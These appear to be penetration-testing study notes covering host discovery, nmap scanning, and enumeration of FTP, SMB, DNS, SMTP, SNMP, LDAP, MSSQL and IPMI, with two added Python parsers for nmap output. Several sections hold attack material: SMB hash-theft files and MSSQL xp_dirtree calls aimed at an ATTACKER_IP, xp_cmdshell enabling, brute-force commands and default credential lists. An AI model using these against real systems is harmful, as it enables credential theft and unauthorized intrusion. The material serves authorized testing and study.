Pentest_Notes

🌐 Network Penetration Testing

Organized notes for network penetration testing: host discovery, port scanning, and service enumeration. Last Updated: 2026-03-27


Reconnaissance / Information Gathering

Overview

Network reconnaissance involves discovering live hosts, open ports, running services, and their versions on target systems. This is the foundation of every penetration test.

Checklist

Passive Network Discovery

# ARP-based passive discovery
netdiscover -i eth1 -r 192.168.123.0/24 -p

# Listen for inbound traffic
sudo tcpdump -i eth1 'dst host 192.168.123.100 and (icmp or udp or tcp or arp)'

# Run Responder in analyze mode (passive)
responder -I eth1 -A

Active Host Discovery

# Nmap ping sweep
nmap -sn -PE -PM -PP -n --open 192.168.123.0/24

# Export live hosts from ping sweep
nmap -sn 10.0.0.0/24 -oG ping_sweep
# Filter to "Status: Up" lines first; otherwise the regex also picks up the target subnet from the header comment
grep 'Status: Up' ping_sweep | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' | sort -u > online
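The same export done as a small parser of nmap's grepable output, added here as an example (not part of the original notes). It keeps only hosts whose line says "Status: Up" and shows, for comparison, what a bare IPv4 regex over the whole file returns when the "Status: Up" filter is skipped: the target subnet from the header comment and any Down hosts come along. The sample -oG text is constructed with made-up addresses.

```python
"""Parse nmap grepable (-oG) output and keep only hosts reported Up.

Added example, not part of the original notes. SAMPLE_PING_SWEEP is a
constructed file in the format nmap writes for `nmap -sn ... -oG ping_sweep`;
the addresses in it are made up. (Down hosts appear in -oG only when nmap is
run with -v; one is included here to show the filter handling it.)
"""
import re
from typing import List

# Constructed sample. Note the header comment: it contains the target subnet
# 10.0.0.0, which a bare IP regex over the whole file would report as a host.
SAMPLE_PING_SWEEP = """\
# Nmap 7.94 scan initiated Thu Mar 27 10:00:00 2026 as: nmap -sn 10.0.0.0/24 -oG ping_sweep
Host: 10.0.0.1 ()\tStatus: Up
Host: 10.0.0.5 (fileserver.lab.local)\tStatus: Up
Host: 10.0.0.9 ()\tStatus: Down
Host: 10.0.0.23 ()\tStatus: Up
# Nmap done at Thu Mar 27 10:00:05 2026 -- 256 IP addresses (3 hosts up) scanned in 5.12 seconds
"""

# One -oG host line: "Host: <ip> (<hostname>)<tab>Status: <state>"
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s+Status:\s+(\w+)")

# The IPv4 regex from the grep one-liner above, used only for the comparison.
IPV4 = re.compile(
    r"((?:1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(?:1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])"
)


def live_hosts(grepable_text: str) -> List[str]:
    """Return the IPs reported Up, in file order, without duplicates."""
    seen = set()
    hosts: List[str] = []
    for line in grepable_text.splitlines():
        if line.startswith("#"):
            continue  # header/footer comments are not scan results
        m = HOST_LINE.match(line)
        if m is None or m.group(3) != "Up":
            continue
        ip = m.group(1)
        if ip not in seen:
            seen.add(ip)
            hosts.append(ip)
    return hosts


def naive_ip_grep(grepable_text: str) -> List[str]:
    """Every IPv4-looking token in the file, including the subnet in the header
    and hosts reported Down; sorted numerically so the output is stable."""
    found = {m.group(0) for m in IPV4.finditer(grepable_text)}
    return sorted(found, key=lambda ip: tuple(int(o) for o in ip.split(".")))


if __name__ == "__main__":
    import sys

    # Usage: python parse_ping_sweep.py ping_sweep > online
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PING_SWEEP
    print("\n".join(live_hosts(text)))
```

Redirect the script's output to the `online` file and the per-host loops further down in these notes work unchanged.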

# fping sweep
fping -asgq 192.168.123.0/24

# Netdiscover active scan
netdiscover -i eth1 -r 192.168.123.0/24

💡 Pro Tip: Not all hosts respond to ICMP. If the ping sweep returns few results, use the -Pn flag with Nmap to skip host discovery and port-scan every IP directly.

Tools

Tool         Purpose                              Basic Command
Nmap         Port scanning & service detection    nmap -p- -sV -sC <IP>
Masscan      Ultra-fast port scanning             masscan -p1-65535 <IP> --rate=1000
Rustscan     Fast port scan + Nmap integration    rustscan -a <IP> -- -sC -sV
Netdiscover  ARP-based host discovery             netdiscover -r <SUBNET>
fping        Fast ping sweep                      fping -asgq <SUBNET>
tcpdump      Packet capture & analysis            sudo tcpdump -i eth1

Port Scanning

Checklist

Nmap Scanning Reference

Basic Scans

# Scan a single IP
nmap 192.168.1.1

# Scan multiple IPs
nmap 192.168.1.1 192.168.1.2

# Scan a range
nmap 192.168.1.1-254

# Scan a subnet
nmap 192.168.1.0/24

# Scan from a file
nmap -iL targets.txt

Scan Types

# TCP SYN scan (default, requires root)
nmap -sS 192.168.1.1

# TCP connect scan (default without root)
nmap -sT 192.168.1.1

# UDP port scan
nmap -sU 192.168.1.1

# TCP ACK scan (firewall detection)
nmap -sA 192.168.1.1

Host Discovery Options

# Disable port scanning (host discovery only)
nmap -sn 192.168.1.1

# Disable host discovery (port scan only)
nmap -Pn 192.168.1.1

# Never do DNS resolution
nmap -n 192.168.1.1

Port Specification

# Scan specific ports
nmap -p 80,443,8080 192.168.1.1

# Scan all 65535 ports
nmap -p- 192.168.1.1

# Scan top N ports
nmap --top-ports 200 192.168.1.1

# Fast scan (top 100 ports)
nmap -F 192.168.1.1

# Scan by service name
nmap -p http,https 192.168.1.1

Version & OS Detection

# Aggressive scan (OS + version + scripts + traceroute)
nmap -A 192.168.1.1

# Version detection
nmap -sV 192.168.1.1

# Version intensity (0-9)
nmap -sV --version-intensity 7 192.168.1.1

# OS detection
nmap -O 192.168.1.1

# Aggressive OS guess
nmap -O --osscan-guess 192.168.1.1

Timing & Performance

# Paranoid (0): slowest, IDS evasion
nmap -T0 192.168.1.1

# Insane (5): fastest
nmap -T5 192.168.1.1

# Minimum packet rate
nmap --min-rate 1000 192.168.1.1

NSE Scripts

# Single script
nmap --script=banner 192.168.1.1

# Script with arguments
nmap --script=banner --script-args <args> 192.168.1.1

# Vulnerability scripts
nmap -p- --script=vuln 192.168.1.1

# HTTP methods enumeration
nmap -p80,443 --script=http-methods --script-args http-methods.url-path='/directory/' <IP>

# SMB share enumeration
nmap --script smb-enum-shares <IP>

Evasion Techniques

# Fragment packets
nmap -f 192.168.1.1

# Set MTU
nmap --mtu 32 192.168.1.1

# Decoy scan
nmap -D 192.168.1.11,192.168.1.12,192.168.1.13 192.168.1.1

Output Formats

# Normal output
nmap -oN scan.txt 192.168.1.1

# All formats (normal + XML + grepable)
nmap -oA scan 192.168.1.1

Recommended Scan Workflow

# Step 1: Quick all-port scan to find open ports
nmap -p- -v --min-rate 4000 -sV <IP>

# Step 2: Detailed scan of discovered ports
nmap -p <open_ports> -vv --min-rate 1000 -sV -sC <IP>

# Step 3: UDP scan
sudo nmap -Pn -n -sU --top-ports=100 <IP>

# Step 4: Detailed UDP version scan
nmap -sUV -vv --reason --version-intensity 0 --min-rate 1300 --max-retries 1 --top-ports 1000 <IP> -Pn
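Gluing step 1 to step 2: if step 1 is run with `-oA step1` (an assumption, since the command above does not save its output), the `step1.xml` file can be parsed to build the `<open_ports>` argument instead of copying ports by hand. This is an added example, not part of the original notes. It uses only the host, address, ports, port and state elements nmap writes; the sample XML below is a constructed, abbreviated document with made-up hosts and ports.

```python
"""Build the <open_ports> argument for the step 2 scan from the XML written by
step 1 when run with -oA (or -oX).

Added example, not part of the original notes. SAMPLE_XML is a constructed,
abbreviated nmap XML document (made-up hosts and ports); real output carries
more attributes, but the elements read here are the ones nmap emits.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -p- -v --min-rate 4000 -sV -oA step1 10.0.0.5 10.0.0.23" start="0">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="filtered" reason="no-response"/></port>
      <port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.0.0.23" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports_by_host(xml_text: str, protocol: str = "tcp") -> Dict[str, List[int]]:
    """Map each IPv4 address to its sorted list of open ports for `protocol`.
    Only state="open" counts: filtered and open|filtered ports are skipped so
    the step 2 -sV/-sC pass is spent on ports that actually answered."""
    root = ET.fromstring(xml_text)
    result: Dict[str, List[int]] = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports: List[int] = []
        for port in host.findall("ports/port"):
            if port.get("protocol") != protocol:
                continue
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                ports.append(int(port.get("portid")))
        result[addr.get("addr")] = sorted(ports)
    return result


def port_arg(ports: List[int]) -> str:
    """Format a port list the way nmap -p expects, e.g. 22,80,8080."""
    return ",".join(str(p) for p in ports)


def step2_commands(xml_text: str) -> List[str]:
    """One detailed-scan command per host with open ports, mirroring step 2."""
    cmds: List[str] = []
    for ip, ports in open_ports_by_host(xml_text).items():
        if ports:
            cmds.append(f"nmap -p {port_arg(ports)} -vv --min-rate 1000 -sV -sC {ip}")
    return cmds


if __name__ == "__main__":
    import sys

    # Usage: python step2_from_xml.py step1.xml
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    print("\n".join(step2_commands(text)))
```

Pass `protocol="udp"` to reuse the same parser on the XML from the UDP steps; ports nmap reports as open|filtered are deliberately left out, so check those by hand if the UDP scan is the only evidence for a service.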

Scanning Multiple Hosts

# Loop scan all live hosts (top 100 ports)
for ip in $(cat online); do nmap -sS -Pn --top-ports 100 -oA "quick_$ip" "$ip"; done

# Full TCP scan of all live hosts
sudo nmap -sS -p- -T4 -iL online -oA full_scan

Masscan

# Quick scan common ports across subnet
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 192.168.123.0/24

# Full port scan
masscan -p1-65535 <IP> --rate=1000 -oL masscan_results.txt

⚠️ CPTS Exam Tip: Always scan for web servers on non-standard ports. Use: nmap -vv -sV -p 80,443,8080,8443,8000,8888,8800,8088,8880,10443,9443 --script http-title --open <IP>

Common Pitfalls / Gotchas


Service Enumeration

Overview

After discovering open ports, each service must be enumerated in depth to identify versions, misconfigurations, and potential attack vectors.

Common Ports & Services Reference

Port Service Protocol
21 FTP TCP
22 SSH TCP
23 Telnet TCP
25 SMTP TCP
53 DNS TCP/UDP
69 TFTP UDP
80 HTTP TCP
88 Kerberos TCP
110 POP3 TCP
111 RPCBind TCP/UDP
135 MS-RPC TCP
139 NetBIOS TCP
143 IMAP TCP
161 SNMP UDP
389 LDAP TCP
443 HTTPS TCP
445 SMB TCP
464 Kpasswd TCP
593 MS-RPC over HTTP TCP
636 LDAPS TCP
993 IMAPS TCP
995 POP3S TCP
1433 MSSQL TCP
1521 Oracle TCP
2049 NFS TCP
3306 MySQL TCP
3389 RDP TCP
5432 PostgreSQL TCP
5900 VNC TCP
5985 WinRM HTTP TCP
5986 WinRM HTTPS TCP
6379 Redis TCP
8080 HTTP Proxy TCP
8443 HTTPS Alt TCP
9200 Elasticsearch TCP
27017 MongoDB TCP

FTP (Port 21)

Checklist

# Connect to FTP
ftp <IP>

# Interact via netcat
nc -nv <IP> 21

# Download all files via anonymous access
wget -m --no-passive ftp://anonymous:anonymous@<IP>

# Nmap FTP scripts
nmap --script ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor -p 21 <IP>

💡 Pro Tip: Always try anonymous:anonymous and anonymous: (empty password) for FTP login.

Common Default Credentials

Username Password
anonymous anonymous
anonymous (empty)
ftp ftp
admin admin

SMB (Ports 139, 445)

Checklist

# Connect to SMB share
smbclient //<IP>/<share>

# Null session enumeration
smbclient -L //<IP>/ -N
nxc smb <IP> -u "" -p "" --shares
nxc smb <IP> -u "guest" -p "" --shares
nxc smb <IP> -u "a" -p "" --shares

# Enumerate shares with smbmap
smbmap -H <IP>

# RPC null session
rpcclient -U "" -N <IP>
rpcclient -U'%' <IP>

# enum4linux
enum4linux -a <IP>

# CrackMapExec / NetExec enumeration
nxc smb <IP> --shares -u '' -p ''

# Connect via impacket
impacket-smbclient domain.com/guest@<IP>

SMB Hash Theft: InternetShortcut (.url file)

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<ATTACKER_IP>\%USERNAME%.icon
IconIndex=1

Upload to writable share and start Responder to capture hashes.

SMB Hash Theft: desktop.ini

[.ShellClassInfo]
IconResource=\\<ATTACKER_IP>\test

# Upload to writable share
smb> put desktop.ini

# Start Responder on attacker
responder -I tun0

Null/Anonymous Session Checks Across Subnet

# Check for SMB null session across all hosts
for ip in $(cat online); do smbclient -L "//$ip/" -N -g >/dev/null 2>&1 && echo $ip; done | tee smb_null.txt

# RPC null session check
for ip in $(cat online); do rpcclient -U "" -N "$ip" -c info 2>&1 | grep -q 'Domain' && echo $ip; done | tee rpc_null.txt

DNS (Port 53)

Checklist

# NS record query
dig ns <domain> @<nameserver>

# ANY query
dig any <domain> @<nameserver>

# Zone transfer attempt
dig axfr <domain> @<nameserver>

# DNS recon
dnsrecon -d <domain>

# Subdomain brute-force with gobuster
gobuster dns -d <domain> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30

⚠️ CPTS Exam Tip: Always try zone transfers (dig axfr): they often reveal hidden subdomains and internal hostnames.


NFS (Port 2049)

Checklist

# Show available NFS shares
showmount -e <IP>

# Mount NFS share
mount -t nfs <IP>:/<share> ./target-NFS/ -o nolock

# Check for NFS exports from subnet
for ip in $(cat online); do showmount -e "$ip" 2>/dev/null | grep -q "export list" && echo $ip; done | tee nfs_exports.txt

SMTP (Port 25)

Checklist

# Connect to SMTP
telnet <IP> 25

# User enumeration
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t <IP>
smtp-user-enum -M RCPT -U userlist.txt -D <domain> -t <IP>
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t <IP>

# DNS lookup for mail servers
host -t MX <domain>
dig mx <domain> | grep "MX" | grep -v ";"

# Brute-force POP3
hydra -L users.txt -p 'Company01!' -f <IP> pop3

# Test for open relay
swaks --from notifications@<domain> --to target@<domain> --header 'Subject: Test' --body 'Test' --server <IP>

SNMP (Port 161/UDP)

Checklist

# Walk SNMP with community string
snmpwalk -v2c -c <community_string> <IP>

# Brute-force community strings
onesixtyone -c community-strings.list <IP>

# Brute-force OIDs
braa <community_string>@<IP>:.1.*

# Check from subnet
for ip in $(cat online); do snmpwalk -v2c -c public -t1 -r1 "$ip" 2>/dev/null | head -n1 | grep -q "STRING\|INTEGER" && echo $ip; done | tee snmp_public.txt

Common SNMP Community Strings

String Type
public Read-only
private Read-write
manager Read-write
community Read-only

IMAP / POP3 (Ports 110, 143, 993, 995)

# Connect to IMAPS
curl -k 'imaps://<IP>' --user <user>:<password>

# Connect to IMAPS via OpenSSL
openssl s_client -connect <IP>:imaps

# Connect to POP3S via OpenSSL
openssl s_client -connect <IP>:pop3s

MSSQL (Port 1433)

# Connect with impacket
impacket-mssqlclient <user>@<IP> -windows-auth

# Enable command execution
EXECUTE sp_configure 'show advanced options', 1
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
xp_cmdshell 'whoami'

# Hash stealing
EXEC master..xp_dirtree '\\<ATTACKER_IP>\share\'
EXEC master..xp_subdirs '\\<ATTACKER_IP>\share\'

IPMI (Port 623/UDP)

# IPMI version detection
msf6> use auxiliary/scanner/ipmi/ipmi_version

# Dump IPMI hashes
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes

Common IPMI Default Credentials

Vendor Username Password
Dell iDRAC root calvin
HP iLO Administrator (random 8-char)
Supermicro ADMIN ADMIN

LDAP (Ports 389, 636)

Checklist

# Anonymous LDAP bind check
for ip in $(cat online); do ldapsearch -x -H "ldap://$ip" -s base -b "" -o nettimeout=3 "(objectclass=*)" 2>/dev/null | head -n1 | grep -q "namingContexts" && echo $ip; done | tee ldap_anon.txt

# Anonymous LDAP dump
ldapdomaindump <IP>

# LDAP search
ldapsearch -x -h <IP> -b "dc=domain,dc=com"

# LDAP user enumeration
ldapsearch -h <IP> -x -b "DC=DOMAIN,DC=COM" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

# LDAP password policy
ldapsearch -h <IP> -x -b "DC=DOMAIN,DC=COM" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

SSH (Port 22)

# Force password authentication
ssh <user>@<IP> -o PreferredAuthentications=password

Useful One-Liners

# Extract IPs from a text file
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

# Alternative IP extraction
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt

# Quick ICMP verification
tcpdump -i any -c5 icmp

Common Pitfalls / Gotchas

References & Further Reading